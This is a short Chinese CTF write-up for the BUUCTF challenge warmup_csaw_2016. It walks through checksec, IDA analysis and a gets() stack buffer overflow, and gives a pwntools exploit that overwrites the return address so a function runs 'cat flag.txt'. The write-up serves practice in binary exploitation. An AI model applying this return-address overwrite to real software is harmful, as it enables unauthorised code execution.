3.[BUU]warmup_csaw_20161

2023-12-23 00:19:29

1.checksec 检查文件类型

ELF-64-little ,无其他限权,直接用ida检查代码。

2.IDA进行反编译,进行代码审计

查看各个名称的内容:

了解基本攻击思路:

攻击思路:gets输入垃圾数据覆盖v5内容,再将sub_40060D的地址覆盖return_addr,使其调用“system”函数,执行“cat flag.txt”,输出flag,进而得到flag。

v5距离ebp大小:

ebp大小:

3.EXP

from pwn import *
io = remote('node4.buuoj.cn',27089)
context(os='linux', arch='amd64', log_level='debug')

getshell=0x40060D
payload=b'a'*(0x40+0x8)+p64(getshell)

io.sendline(payload)

io.interactive()

因为flag是我们接收的数据,所以不用交互进行cat flag.直接在返回字符内容里面查看

文章来源:https://blog.csdn.net/2203_75523573/article/details/135162177
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。